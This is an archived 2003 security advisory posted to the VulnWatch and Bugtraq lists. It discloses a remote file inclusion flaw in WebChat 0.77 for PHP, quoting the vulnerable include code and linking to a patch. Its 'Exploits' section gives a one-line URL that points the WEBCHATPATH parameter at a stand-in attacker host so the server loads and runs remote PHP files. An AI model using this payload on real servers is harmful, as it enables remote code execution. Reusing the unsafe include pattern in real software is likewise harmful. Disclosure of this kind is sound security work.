[VulnWatch] WebChat (PHP)

From: Frog Man (leseulfrog@hotmail.com)
Date: 03/03/03

  • Next message: info@elcomsoft.com: "[VulnWatch] Implementation flaws in Adobe Document Server for Reader Extensions"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Mon, 03 Mar 2003 13:57:43 +0100
    
    

    Informations :
    같같같같같같같
    Version : 0.77
    Website : http://www.webdev.ro
    Problem : File Including

    PHP Code/Location :
    같같같같같같같같같
    defines.php :
    -----------------------------------------------
    <?
    if (!isset($WEBCHATPATH)) {
             $WEBCHATPATH = './';
    }
    include ($WEBCHATPATH.'db_mysql.php');
    include ($WEBCHATPATH.'language/english.php');
    [...]
    -----------------------------------------------

    Exploits :
    같같같같같
    http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
    with :
    http://[attacker]/db_mysql.php and
    http://[attacker]/language/english.php

    Patch :
    같같같
    A patch can be found on http://www.phpsecure.info (-> New Version !! :))

    More Details :
    같같같같같같같
    In French :
    http://www.frog-man.org/tutos/WebChat.txt

    frog-m@n

    _________________________________________________________________
    MSN Messenger : discutez en direct avec vos amis !
    http://messenger.fr.msn.be


  • Next message: info@elcomsoft.com: "[VulnWatch] Implementation flaws in Adobe Document Server for Reader Extensions"

    Relevant Pages

    • Video card - AGP 8x???
      ... MSN Messenger: discutez en direct avec vos amis! ...
      (Debian-User)
    • WAnewsletter (PHP)
      ... Website: http://www.phpcodeur.net ... discutez en direct avec vos amis! ...
      (Bugtraq)
    • WebChat (PHP)
      ... Website: http://www.webdev.ro ... discutez en direct avec vos amis! ...
      (Bugtraq)
    • PEEL (PHP)
      ... Website: http://www.mapetite-entreprise.com ... PHP Code/Location: ... discutez en direct avec vos amis! ...
      (Bugtraq)
    • [VulnWatch] D-Forum (PHP)
      ... Website: http://www.adalis.fr/adalis.html ... discutez en direct avec vos amis! ...
      (VulnWatch)